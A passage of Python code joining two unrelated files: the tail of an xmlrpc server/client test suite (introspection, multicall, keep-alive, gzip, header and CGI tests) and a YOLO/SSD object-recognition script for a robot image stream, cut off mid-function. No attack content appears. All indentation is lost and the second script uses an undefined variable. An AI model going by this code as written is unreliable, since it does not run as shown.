d = serv.add_dispatcher(path, xmlrpc.server.SimpleXMLRPCDispatcher())
d.register_introspection_functions()
d.register_multicall_functions()
serv.get_dispatcher(paths[0]).register_function(pow)
serv.get_dispatcher(paths[1]).register_function(lambda x,y: x+y, 'add')
serv.add_dispatcher("/is/broken", BrokenDispatcher())
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
# This function prevents errors like:
# <ProtocolError for localhost:57527/RPC2: 500 Internal Server Error>
def is_unavailable_exception(e):
'''Returns True if the given ProtocolError is the product of a server-side
exception caused by the 'temporarily unavailable' response sometimes
given by operations on non-blocking sockets.'''
# sometimes we get a -1 error code and/or empty headers
try:
if e.errcode == -1 or e.headers is None:
return True
exc_mess = e.headers.get('X-exception')
except AttributeError:
# Ignore OSErrors here.
exc_mess = str(e)
if exc_mess and 'temporarily unavailable' in exc_mess.lower():
return True
def make_request_and_skipIf(condition, reason):
# If we skip the test, we have to make a request because
# the server created in setUp blocks expecting one to come in.
if not condition:
return lambda func: func
def decorator(func):
def make_request_and_skip(self):
try:
xmlrpclib.ServerProxy(URL).my_function()
except (xmlrpclib.ProtocolError, OSError) as e:
if not is_unavailable_exception(e):
raise
raise unittest.SkipTest(reason)
return make_request_and_skip
return decorator
class BaseServerTestCase(unittest.TestCase):
requestHandler = None
request_count = 1
threadFunc = staticmethod(http_server)
def setUp(self):
# enable traceback reporting
xmlrpc.server.SimpleXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, self.request_count, self.requestHandler)
thread = threading.Thread(target=self.threadFunc, args=serv_args)
thread.start()
self.addCleanup(thread.join)
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# disable traceback reporting
xmlrpc.server.SimpleXMLRPCServer._send_traceback_header = False
class SimpleServerTestCase(BaseServerTestCase):
def test_simple1(self):
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_nonascii(self):
start_string = 'P\N{LATIN SMALL LETTER Y WITH CIRCUMFLEX}t'
end_string = 'h\N{LATIN SMALL LETTER O WITH HORN}n'
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_client_encoding(self):
start_string = '\u20ac'
end_string = '\xa4'
try:
p = xmlrpclib.ServerProxy(URL, encoding='iso-8859-15')
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_nonascii_methodname(self):
try:
p = xmlrpclib.ServerProxy(URL, encoding='ascii')
self.assertEqual(p.têšt(42), 42)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_404(self):
# send POST with http.client, it should return 404 header and
# 'Not Found' message.
with contextlib.closing(http.client.HTTPConnection(ADDR, PORT)) as conn:
conn.request('POST', '/this-is-not-valid')
response = conn.getresponse()
self.assertEqual(response.status, 404)
self.assertEqual(response.reason, 'Not Found')
def test_introspection1(self):
expected_methods = set(['pow', 'div', 'my_function', 'add', 'têšt',
'system.listMethods', 'system.methodHelp',
'system.methodSignature', 'system.multicall',
'Fixture'])
try:
p = xmlrpclib.ServerProxy(URL)
meth = p.system.listMethods()
self.assertEqual(set(meth), expected_methods)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection2(self):
try:
# test _methodHelp()
p = xmlrpclib.ServerProxy(URL)
divhelp = p.system.methodHelp('div')
self.assertEqual(divhelp, 'This is the div function')
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
@make_request_and_skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_introspection3(self):
try:
# test native doc
p = xmlrpclib.ServerProxy(URL)
myfunction = p.system.methodHelp('my_function')
self.assertEqual(myfunction, 'This is my function')
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection4(self):
# the SimpleXMLRPCServer doesn't support signatures, but
# at least check that we can try making the call
try:
p = xmlrpclib.ServerProxy(URL)
divsig = p.system.methodSignature('div')
self.assertEqual(divsig, 'signatures not supported')
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.add(2,3)
multicall.pow(6,8)
multicall.div(127,42)
add_result, pow_result, div_result = multicall()
self.assertEqual(add_result, 2+3)
self.assertEqual(pow_result, 6**8)
self.assertEqual(div_result, 127//42)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_non_existing_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.this_is_not_exists()
result = multicall()
            # result.results contains:
# [{'faultCode': 1, 'faultString': '<class \'exceptions.Exception\'>:'
# 'method "this_is_not_exists" is not supported'>}]
self.assertEqual(result.results[0]['faultCode'], 1)
self.assertEqual(result.results[0]['faultString'],
'<class \'Exception\'>:method "this_is_not_exists" '
'is not supported')
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_dotted_attribute(self):
# Raises an AttributeError because private methods are not allowed.
self.assertRaises(AttributeError,
xmlrpc.server.resolve_dotted_attribute, str, '__add')
self.assertTrue(xmlrpc.server.resolve_dotted_attribute(str, 'title'))
# Get the test to run faster by sending a request with test_simple1.
# This avoids waiting for the socket timeout.
self.test_simple1()
def test_allow_dotted_names_true(self):
# XXX also need allow_dotted_names_false test.
server = xmlrpclib.ServerProxy("http://%s:%d/RPC2" % (ADDR, PORT))
data = server.Fixture.getData()
self.assertEqual(data, '42')
def test_unicode_host(self):
server = xmlrpclib.ServerProxy("http://%s:%d/RPC2" % (ADDR, PORT))
self.assertEqual(server.add("a", "\xe9"), "a\xe9")
def test_partial_post(self):
# Check that a partial POST doesn't make the server loop: issue #14001.
with contextlib.closing(socket.create_connection((ADDR, PORT))) as conn:
conn.send('POST /RPC2 HTTP/1.0\r\n'
'Content-Length: 100\r\n\r\n'
'bye HTTP/1.1\r\n'
f'Host: {ADDR}:{PORT}\r\n'
'Accept-Encoding: identity\r\n'
'Content-Length: 0\r\n\r\n'.encode('ascii'))
def test_context_manager(self):
with xmlrpclib.ServerProxy(URL) as server:
server.add(2, 3)
self.assertNotEqual(server('transport')._connection,
(None, None))
self.assertEqual(server('transport')._connection,
(None, None))
def test_context_manager_method_error(self):
try:
with xmlrpclib.ServerProxy(URL) as server:
server.add(2, "a")
except xmlrpclib.Fault:
pass
self.assertEqual(server('transport')._connection,
(None, None))
class SimpleServerEncodingTestCase(BaseServerTestCase):
@staticmethod
def threadFunc(evt, numrequests, requestHandler=None, encoding=None):
http_server(evt, numrequests, requestHandler, 'iso-8859-15')
def test_server_encoding(self):
start_string = '\u20ac'
end_string = '\xa4'
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
class MultiPathServerTestCase(BaseServerTestCase):
threadFunc = staticmethod(http_multi_server)
request_count = 2
def test_path1(self):
p = xmlrpclib.ServerProxy(URL+"/foo")
self.assertEqual(p.pow(6,8), 6**8)
self.assertRaises(xmlrpclib.Fault, p.add, 6, 8)
def test_path2(self):
p = xmlrpclib.ServerProxy(URL+"/foo/bar")
self.assertEqual(p.add(6,8), 6+8)
self.assertRaises(xmlrpclib.Fault, p.pow, 6, 8)
def test_path3(self):
p = xmlrpclib.ServerProxy(URL+"/is/broken")
self.assertRaises(xmlrpclib.Fault, p.add, 6, 8)
#A test case that verifies that a server using the HTTP/1.1 keep-alive mechanism
#does indeed serve subsequent requests on the same connection
class BaseKeepaliveServerTestCase(BaseServerTestCase):
#a request handler that supports keep-alive and logs requests into a
#class variable
class RequestHandler(xmlrpc.server.SimpleXMLRPCRequestHandler):
parentClass = xmlrpc.server.SimpleXMLRPCRequestHandler
protocol_version = 'HTTP/1.1'
myRequests = []
def handle(self):
self.myRequests.append([])
self.reqidx = len(self.myRequests)-1
return self.parentClass.handle(self)
def handle_one_request(self):
result = self.parentClass.handle_one_request(self)
self.myRequests[self.reqidx].append(self.raw_requestline)
return result
requestHandler = RequestHandler
def setUp(self):
#clear request log
self.RequestHandler.myRequests = []
return BaseServerTestCase.setUp(self)
#A test case that verifies that a server using the HTTP/1.1 keep-alive mechanism
#does indeed serve subsequent requests on the same connection
class KeepaliveServerTestCase1(BaseKeepaliveServerTestCase):
def test_two(self):
p = xmlrpclib.ServerProxy(URL)
#do three requests.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
p("close")()
#they should have all been handled by a single request handler
self.assertEqual(len(self.RequestHandler.myRequests), 1)
#check that we did at least two (the third may be pending append
#due to thread scheduling)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-1]), 2)
#test special attribute access on the serverproxy, through the __call__
#function.
class KeepaliveServerTestCase2(BaseKeepaliveServerTestCase):
#ask for two keepalive requests to be handled.
request_count=2
def test_close(self):
p = xmlrpclib.ServerProxy(URL)
#do some requests with close.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
p("close")() #this should trigger a new keep-alive request
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
p("close")()
        #there should have been two request handlers, each having logged at
        #least two complete requests
self.assertEqual(len(self.RequestHandler.myRequests), 2)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-1]), 2)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-2]), 2)
def test_transport(self):
p = xmlrpclib.ServerProxy(URL)
#do some requests with close.
self.assertEqual(p.pow(6,8), 6**8)
p("transport").close() #same as above, really.
self.assertEqual(p.pow(6,8), 6**8)
p("close")()
self.assertEqual(len(self.RequestHandler.myRequests), 2)
#A test case that verifies that gzip encoding works in both directions
#(for a request and the response)
@unittest.skipIf(gzip is None, 'requires gzip')
class GzipServerTestCase(BaseServerTestCase):
#a request handler that supports keep-alive and logs requests into a
#class variable
class RequestHandler(xmlrpc.server.SimpleXMLRPCRequestHandler):
parentClass = xmlrpc.server.SimpleXMLRPCRequestHandler
protocol_version = 'HTTP/1.1'
def do_POST(self):
#store content of last request in class
self.__class__.content_length = int(self.headers["content-length"])
return self.parentClass.do_POST(self)
requestHandler = RequestHandler
class Transport(xmlrpclib.Transport):
#custom transport, stores the response length for our perusal
fake_gzip = False
def parse_response(self, response):
self.response_length=int(response.getheader("content-length", 0))
return xmlrpclib.Transport.parse_response(self, response)
def send_content(self, connection, body):
if self.fake_gzip:
#add a lone gzip header to induce decode error remotely
connection.putheader("Content-Encoding", "gzip")
return xmlrpclib.Transport.send_content(self, connection, body)
def setUp(self):
BaseServerTestCase.setUp(self)
def test_gzip_request(self):
t = self.Transport()
t.encode_threshold = None
p = xmlrpclib.ServerProxy(URL, transport=t)
self.assertEqual(p.pow(6,8), 6**8)
a = self.RequestHandler.content_length
t.encode_threshold = 0 #turn on request encoding
self.assertEqual(p.pow(6,8), 6**8)
b = self.RequestHandler.content_length
self.assertTrue(a>b)
p("close")()
def test_bad_gzip_request(self):
t = self.Transport()
t.encode_threshold = None
t.fake_gzip = True
p = xmlrpclib.ServerProxy(URL, transport=t)
cm = self.assertRaisesRegex(xmlrpclib.ProtocolError,
re.compile(r"\b400\b"))
with cm:
p.pow(6, 8)
p("close")()
def test_gzip_response(self):
t = self.Transport()
p = xmlrpclib.ServerProxy(URL, transport=t)
old = self.requestHandler.encode_threshold
self.requestHandler.encode_threshold = None #no encoding
self.assertEqual(p.pow(6,8), 6**8)
a = t.response_length
self.requestHandler.encode_threshold = 0 #always encode
self.assertEqual(p.pow(6,8), 6**8)
p("close")()
b = t.response_length
self.requestHandler.encode_threshold = old
self.assertTrue(a>b)
@unittest.skipIf(gzip is None, 'requires gzip')
class GzipUtilTestCase(unittest.TestCase):
def test_gzip_decode_limit(self):
max_gzip_decode = 20 * 1024 * 1024
data = b'\0' * max_gzip_decode
encoded = xmlrpclib.gzip_encode(data)
decoded = xmlrpclib.gzip_decode(encoded)
self.assertEqual(len(decoded), max_gzip_decode)
data = b'\0' * (max_gzip_decode + 1)
encoded = xmlrpclib.gzip_encode(data)
with self.assertRaisesRegex(ValueError,
"max gzipped payload length exceeded"):
xmlrpclib.gzip_decode(encoded)
xmlrpclib.gzip_decode(encoded, max_decode=-1)
class HeadersServerTestCase(BaseServerTestCase):
class RequestHandler(xmlrpc.server.SimpleXMLRPCRequestHandler):
test_headers = None
def do_POST(self):
self.__class__.test_headers = self.headers
return super().do_POST()
requestHandler = RequestHandler
standard_headers = [
'Host', 'Accept-Encoding', 'Content-Type', 'User-Agent',
'Content-Length']
def setUp(self):
self.RequestHandler.test_headers = None
return super().setUp()
def assertContainsAdditionalHeaders(self, headers, additional):
expected_keys = sorted(self.standard_headers + list(additional.keys()))
self.assertListEqual(sorted(headers.keys()), expected_keys)
for key, value in additional.items():
self.assertEqual(headers.get(key), value)
def test_header(self):
p = xmlrpclib.ServerProxy(URL, headers=[('X-Test', 'foo')])
self.assertEqual(p.pow(6, 8), 6**8)
headers = self.RequestHandler.test_headers
self.assertContainsAdditionalHeaders(headers, {'X-Test': 'foo'})
def test_header_many(self):
p = xmlrpclib.ServerProxy(
URL, headers=[('X-Test', 'foo'), ('X-Test-Second', 'bar')])
self.assertEqual(p.pow(6, 8), 6**8)
headers = self.RequestHandler.test_headers
self.assertContainsAdditionalHeaders(
headers, {'X-Test': 'foo', 'X-Test-Second': 'bar'})
def test_header_empty(self):
p = xmlrpclib.ServerProxy(URL, headers=[])
self.assertEqual(p.pow(6, 8), 6**8)
headers = self.RequestHandler.test_headers
self.assertContainsAdditionalHeaders(headers, {})
def test_header_tuple(self):
p = xmlrpclib.ServerProxy(URL, headers=(('X-Test', 'foo'),))
self.assertEqual(p.pow(6, 8), 6**8)
headers = self.RequestHandler.test_headers
self.assertContainsAdditionalHeaders(headers, {'X-Test': 'foo'})
def test_header_items(self):
p = xmlrpclib.ServerProxy(URL, headers={'X-Test': 'foo'}.items())
self.assertEqual(p.pow(6, 8), 6**8)
headers = self.RequestHandler.test_headers
self.assertContainsAdditionalHeaders(headers, {'X-Test': 'foo'})
#Test special attributes of the ServerProxy object
class ServerProxyTestCase(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
# Actual value of the URL doesn't matter if it is a string in
# the correct format.
self.url = 'http://fake.localhost'
def test_close(self):
p = xmlrpclib.ServerProxy(self.url)
self.assertEqual(p('close')(), None)
def test_transport(self):
t = xmlrpclib.Transport()
p = xmlrpclib.ServerProxy(self.url, transport=t)
self.assertEqual(p('transport'), t)
# This is a contrived way to make a failure occur on the server side
# in order to test the _send_traceback_header flag on the server
class FailingMessageClass(http.client.HTTPMessage):
def get(self, key, failobj=None):
key = key.lower()
if key == 'content-length':
return 'I am broken'
return super().get(key, failobj)
class FailingServerTestCase(unittest.TestCase):
def setUp(self):
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
thread = threading.Thread(target=http_server, args=serv_args)
thread.start()
self.addCleanup(thread.join)
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# reset flag
xmlrpc.server.SimpleXMLRPCServer._send_traceback_header = False
# reset message class
default_class = http.client.HTTPMessage
xmlrpc.server.SimpleXMLRPCRequestHandler.MessageClass = default_class
def test_basic(self):
# check that flag is false by default
flagval = xmlrpc.server.SimpleXMLRPCServer._send_traceback_header
self.assertEqual(flagval, False)
# enable traceback reporting
xmlrpc.server.SimpleXMLRPCServer._send_traceback_header = True
# test a call that shouldn't fail just as a smoke test
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_fail_no_info(self):
# use the broken message class
xmlrpc.server.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# The two server-side error headers shouldn't be sent back in this case
self.assertTrue(e.headers.get("X-exception") is None)
self.assertTrue(e.headers.get("X-traceback") is None)
else:
self.fail('ProtocolError not raised')
def test_fail_with_info(self):
# use the broken message class
xmlrpc.server.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
# Check that errors in the server send back exception/traceback
# info when flag is set
xmlrpc.server.SimpleXMLRPCServer._send_traceback_header = True
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# We should get error info in the response
expected_err = "invalid literal for int() with base 10: 'I am broken'"
self.assertEqual(e.headers.get("X-exception"), expected_err)
self.assertTrue(e.headers.get("X-traceback") is not None)
else:
self.fail('ProtocolError not raised')
@contextlib.contextmanager
def captured_stdout(encoding='utf-8'):
"""A variation on support.captured_stdout() which gives a text stream
having a `buffer` attribute.
"""
orig_stdout = sys.stdout
sys.stdout = io.TextIOWrapper(io.BytesIO(), encoding=encoding)
try:
yield sys.stdout
finally:
sys.stdout = orig_stdout
class CGIHandlerTestCase(unittest.TestCase):
def setUp(self):
self.cgi = xmlrpc.server.CGIXMLRPCRequestHandler()
def tearDown(self):
self.cgi = None
def test_cgi_get(self):
with support.EnvironmentVarGuard() as env:
env['REQUEST_METHOD'] = 'GET'
# if the method is GET and no request_text is given, it runs handle_get
# get sysout output
with captured_stdout(encoding=self.cgi.encoding) as data_out:
self.cgi.handle_request()
# parse Status header
data_out.seek(0)
handle = data_out.read()
status = handle.split()[1]
message = ' '.join(handle.split()[2:4])
self.assertEqual(status, '400')
self.assertEqual(message, 'Bad Request')
def test_cgi_xmlrpc_response(self):
data = """<?xml version='1.0'?>
<methodCall>
<methodName>test_method</methodName>
<params>
<param>
<value><string>foo</string></value>
</param>
<param>
<value><string>bar</string></value>
</param>
</params>
</methodCall>
"""
with support.EnvironmentVarGuard() as env, \
captured_stdout(encoding=self.cgi.encoding) as data_out, \
support.captured_stdin() as data_in:
data_in.write(data)
data_in.seek(0)
env['CONTENT_LENGTH'] = str(len(data))
self.cgi.handle_request()
data_out.seek(0)
# will respond exception, if so, our goal is achieved ;)
handle = data_out.read()
# skip the first 44 characters (the HTTP header); we only
# need the XML payload
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, handle[44:])
# Also test the content-length returned by handle_request
# Using the same test method in order to avoid all the data-passing
# boilerplate code.
# Test for bug: http://bugs.python.org/issue5040
content = handle[handle.find("<?xml"):]
self.assertEqual(
int(re.search(r'Content-Length: (\d+)', handle).group(1)),
len(content))
class UseBuiltinTypesTestCase(unittest.TestCase):
def test_use_builtin_types(self):
# SimpleXMLRPCDispatcher.__init__ accepts use_builtin_types, which
# makes all dispatch of binary data as bytes instances, and all
# dispatch of datetime argument as datetime.datetime instances.
self.log = []
expected_bytes = b"my dog has fleas"
expected_date = datetime.datetime(2008, 5, 26, 18, 25, 12)
marshaled = xmlrpclib.dumps((expected_bytes, expected_date), 'foobar')
def foobar(*args):
self.log.extend(args)
handler = xmlrpc.server.SimpleXMLRPCDispatcher(
allow_none=True, encoding=None, use_builtin_types=True)
handler.register_function(foobar)
handler._marshaled_dispatch(marshaled)
self.assertEqual(len(self.log), 2)
mybytes, mydate = self.log
self.assertEqual(self.log, [expected_bytes, expected_date])
self.assertIs(type(mydate), datetime.datetime)
self.assertIs(type(mybytes), bytes)
def test_cgihandler_has_use_builtin_types_flag(self):
handler = xmlrpc.server.CGIXMLRPCRequestHandler(use_builtin_types=True)
self.assertTrue(handler.use_builtin_types)
def test_xmlrpcserver_has_use_builtin_types_flag(self):
server = xmlrpc.server.SimpleXMLRPCServer(("localhost", 0),
use_builtin_types=True)
server.server_close()
self.assertTrue(server.use_builtin_types)
@support.reap_threads
def test_main():
support.run_unittest(XMLRPCTestCase, HelperTestCase, DateTimeTestCase,
BinaryTestCase, FaultTestCase, UseBuiltinTypesTestCase,
SimpleServerTestCase, SimpleServerEncodingTestCase,
KeepaliveServerTestCase1, KeepaliveServerTestCase2,
GzipServerTestCase, GzipUtilTestCase, HeadersServerTestCase,
MultiPathServerTestCase, ServerProxyTestCase, FailingServerTestCase,
CGIHandlerTestCase, SimpleXMLRPCDispatcherTestCase)
if __name__ == "__main__":
test_main()
|
ObjectRecognition.py | import numpy as np
import threading
import time
import nep
import cv2
import sys
from PIL import Image
import sharo
show_image = 1
model = "yolo3-320"
try:
model = sys.argv[1]
print ("Model:" + model)
show_image = int(sys.argv[2])
print ("Show image: " + str(show_image))
except:
pass
path_models = "models/" #Path to models
# ------- Yolo parameters ------------
confThreshold = 0.5 #Confidence threshold
nmsThreshold = 0.4 #Non-maximum suppression threshold
# ------- TF parameters ------------
confThreshold = 0.5 #Confidence threshold
maskThreshold = 0.3 # Mask threshold
if model == "yolo3-320" or model == "yolo3-tiny":
inpWidth = 320 #Width of network's input image
inpHeight = 320 #Height of network's input image
classesFile = path_models + "coco.names"
elif model == "yolo3-416":
inpWidth = 416 #Width of network's input image
inpHeight = 416 #Height of network's input image
classesFile = path_models + "coco.names"
else:
inpWidth = 300 #Width of network's input image
inpHeight = 300 #Height of network's input image
classesFile = path_models + "coco_ms.names"
classes = None
with open(classesFile, 'rt') as f:
classes = f.read().rstrip('\n').split('\n')
print (classes)
# Lock primitive for securely accessing a shared variable
lock = threading.Lock()
# ---------- Nep -----------------
node = nep.node("object_recognition")
sub_img = node.new_sub("robot_image", "image") # Set the topic and the configuration
object_per = sharo.ObjectPerception(node, classes)
print("usb source")
pub_image = node.new_pub('robot_image_recognition','image')
myImage = cv2.imread("x.jpg") # Temporary placeholder image used until the first frame arrives (the file must exist on disk, otherwise myImage is None)
def thread_function(name): # Get images as soon as possible
global myImage
while True:
s, img = sub_img.listen()
if s:
lock.acquire()
myImage = img.copy()
lock.release()
get_images = threading.Thread(target=thread_function, args=(1,))
get_images.start()
# pascal-voc-classes.txt
CLASSES = ["background", "aeroplane", "bicycle", "bird", "boat",
"bottle", "bus", "car", "cat", "chair", "cow", "diningtable",
"dog", "horse", "motorbike", "person", "pottedplant", "sheep",
"sofa", "train", "tvmonitor"]
# BGR color
COLORS = (51,51,255)
def predict_detection(frame, net):
'''
Predict the objects present on the frame
'''
# Conversion to blob
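# The scalefactor 0.007843 is roughly 1/127.5 and the mean is 127.5, so pixel
# values are rescaled to approximately [-1, 1], the preprocessing expected by
# the MobileNet-SSD Caffe model loaded below.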
blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)),0.007843, (300, 300), 127.5)
#blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)),0.007843, (300, 300), (127.5, 127.5, 127.5), False)
# Detection and prediction with model
net.setInput(blob)
return net.forward()
# Remove the bounding boxes with low confidence using non-maxima suppression
def postprocess(frame, outs):
frameHeight = frame.shape[0]
frameWidth = frame.shape[1]
# Scan through all the bounding boxes output from the network and keep only the
# ones with high confidence scores. Assign the box's class label as the class with the highest score.
classIds = []
confidences = []
boxes = []
for out in outs:
for detection in out:
scores = detection[5:]
classId = np.argmax(scores)
confidence = scores[classId]
if confidence > confThreshold:
center_x = int(detection[0] * frameWidth)
center_y = int(detection[1] * frameHeight)
width = int(detection[2] * frameWidth)
height = int(detection[3] * frameHeight)
left = int(center_x - width / 2)
top = int(center_y - height / 2)
classIds.append(classId)
confidences.append(float(confidence))
boxes.append([left, top, width, height])
# Perform non maximum suppression to eliminate redundant overlapping boxes with
# lower confidences.
indices = cv2.dnn.NMSBoxes(boxes, confidences, confThreshold, nmsThreshold)
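# Note: with OpenCV 3.x, NMSBoxes returns a column vector, hence the i = i[0]
# unwrapping below; OpenCV 4.x returns a flat array, in which case that
# unwrapping line would need to be removed.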
list_labels = []
list_index = []
for i in indices:
i = i[0]
box = boxes[i]
left = box[0]
top = box[1]
width = box[2]
height = box[3]
drawPred(classIds[i], confidences[i], left, top, left + width, top + height, frame)
if confidences[i] > 0.5:
label = classes[classIds[i]]
position = [left + width/2, top + height/2]
list_index.append(classIds[i])
list_labels.append(label)
object_per.manage_objects(list_index)
#print(list_labels)
#print(list_index)
def getOutputsNames(net):
# Get the names of all the layers in the network
layersNames = net.getLayerNames()
# Get the names of the output layers, i.e. the layers with unconnected outputs
return [layersNames[i[0] - 1] for i in net.getUnconnectedOutLayers()]
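# Note: this indexing assumes OpenCV 3.x, where getUnconnectedOutLayers()
# returns nested arrays; with OpenCV 4.x it returns a flat array and the
# expression would be layersNames[i - 1].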
# Draw the predicted bounding box yolo
def drawPred(classId, conf, left, top, right, bottom, frame):
# Draw a bounding box.
cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255))
label = '%.2f' % conf
# Get the label for the class name and its confidence
if classes:
assert(classId < len(classes))
label = '%s:%s' % (classes[classId], label)
#Display the label at the top of the bounding box
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.5, 1)
top = max(top, labelSize[1])
cv2.putText(frame, label, (left, top), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255))
def draw_prediction(frame, detections, exploration_map, zone):
'''
Filters the predictions with a confidence threshold and draws these predictions
'''
(height, width) = frame.shape[:2]
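# The SSD output tensor has shape [1, 1, N, 7]; each detection row is
# [image_id, class_id, confidence, x_min, y_min, x_max, y_max], with the
# box coordinates normalized to [0, 1].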
for i in np.arange(0, detections.shape[2]):
confidence = detections[0, 0, i, 2]
if confidence > 0.5:
# Index of class label and bounding box are extracted
idx = int(detections[0, 0, i, 1])
box = detections[0, 0, i, 3:7] * np.array([width, height, width, height])
# Retreives corners of the bounding box
(startX, startY, endX, endY) = box.astype("int")
label = "{}: {:.2f}%".format(CLASSES[idx], confidence*100)
cv2.rectangle(frame, (startX, startY), (endX, endY),(255, 0, 0), 2)
labelPosition = endY - 5
cv2.putText(frame, label, (startX, labelPosition),
cv2.FONT_HERSHEY_DUPLEX, 0.4, (255, 255, 255), 1)
return frame
# Draw the predicted bounding box, colorize and show the mask on the image
def drawBox(frame, classId, conf, left, top, right, bottom, classMask):
# Draw a bounding box.
cv2.rectangle(frame, (left, top), (right, bottom), (255, 178, 50), 3)
# Print a label of class.
label = '%.2f' % conf
if classes:
assert(classId < len(classes))
label = '%s:%s' % (classes[classId], label)
# Display the label at the top of the bounding box
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.5, 1)
top = max(top, labelSize[1])
cv2.rectangle(frame, (left, top - round(1.5*labelSize[1])), (left + round(1.5*labelSize[0]), top + baseLine), (255, 255, 255), cv2.FILLED)
cv2.putText(frame, label, (left, top), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0,0,0), 1)
# Resize the mask, threshold, color and apply it on the image
classMask = cv2.resize(classMask, (right - left + 1, bottom - top + 1))
mask = (classMask > maskThreshold)
roi = frame[top:bottom+1, left:right+1][mask]
# NOTE: 'colors' is not defined in this file; it must be provided elsewhere
# (e.g. a list of BGR tuples, one per class) for this function to run.
color = colors[classId%len(colors)]
# Comment the above line and uncomment the two lines below to generate different instance colors
#colorIndex = random.randint(0, len(colors)-1)
#color = colors[colorIndex]
